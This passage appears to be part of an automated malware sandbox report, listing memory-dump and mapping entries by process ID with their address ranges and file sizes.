                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5296-691-0x000001D338640000-0x000001D338642000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5296-590-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5296-694-0x000001D338643000-0x000001D338645000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5352-601-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5352-565-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5356-608-0x0000000006C52000-0x0000000006C53000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5356-600-0x0000000006C50000-0x0000000006C51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5356-567-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5372-671-0x000001AB78E53000-0x000001AB78E55000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5372-599-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5372-667-0x000001AB78E50000-0x000001AB78E52000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5452-551-0x0000000005280000-0x000000000577E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  5.0MB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5452-385-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  48KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5452-397-0x0000000000406A6E-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5452-402-0x0000000000400000-0x0000000000401000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5452-410-0x00000000051E0000-0x00000000051E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5504-592-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5616-708-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5648-660-0x000001415FD10000-0x000001415FD12000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5648-596-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5672-414-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5688-582-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5688-682-0x000001B4D68F3000-0x000001B4D68F5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5688-675-0x000001B4D68F0000-0x000001B4D68F2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5696-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5696-439-0x0000000001380000-0x0000000001937000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  5.7MB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5728-597-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5780-429-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5780-462-0x000002642BE30000-0x000002642BE32000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5780-465-0x000002642BE33000-0x000002642BE35000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5800-430-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5832-532-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5860-651-0x0000023685FA3000-0x0000023685FA5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5860-586-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5860-647-0x0000023685FA0000-0x0000023685FA2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5924-816-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5956-494-0x0000000004F70000-0x0000000004F71000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5956-440-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/5956-502-0x0000000004F72000-0x0000000004F73000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/5988-443-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6004-535-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6084-591-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6100-544-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6100-783-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6128-686-0x000001F2AA770000-0x000001F2AA772000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/6128-688-0x000001F2AA773000-0x000001F2AA775000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                • memory/6128-588-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6192-733-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6584-790-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6756-810-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6776-726-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6800-654-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6872-662-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/6916-727-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                • memory/7208-819-0x0000000000000000-mapping.dmp